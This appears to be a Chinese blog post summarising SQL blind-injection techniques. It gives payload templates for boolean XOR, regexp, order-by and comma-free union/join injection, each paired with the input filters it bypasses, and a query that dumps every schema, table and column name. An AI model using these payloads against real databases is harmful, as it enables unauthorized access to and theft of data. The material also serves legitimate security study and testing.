内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

sql盲注总结

2018-10-08 16:11 出处:清屏网 人气: 评论(0

  • 基本payload

    admin^(ascii(mid((password)from(i)))>j)^'1'='1'%23
    或者
    admin^(ascii(mid((password)from(i)for(1)))>j)^'1'='1'%23
    

    ascii函数默认取字符串中第一个字符的ascii码作为输出

  • 使用场景

    • 过滤了关键字: and or
    • 过滤了逗号
    • 过滤了空格

regexp注入

  • 基本payload

    select (select xxxx) regexp '正则'
    
  • 使用场景

    • 过滤了 =in , like

order by 盲注

  • 基本payload

    select * from users where user_id='1' union select 1,2,'a',4,5,6,7 order by 3
    
  • 使用场景

    • 过滤了列名
    • 过滤了括号
    • 适用于已知该表的列名以及列名位置的注入

join注入

  • payload:

    1' union select * from(select 1)a join (select 2)b %23
    union all
    select * from(
        (select 1)a join(
            select F.[需要查询的字段号] from(
                select * from [需要查询的表有多少个字段就join多少个]
                union
                select * from [需要查询的表] [limit子句]
            )F-- 我们创建的虚拟表没有表名,因此定义一个别名,然后直接[别名].[字段号]查询数据
        )b-- 同上[还差多少字段就再join多少个,以满足字段数相同的原则]
    )
    
  • 使用场景:

    • 过滤了逗号、字段名

Other tips

  • 一次性爆所有表名和字段名:

    (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
    

分享给小伙伴们:
本文标签: sql盲注sql注入盲注

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号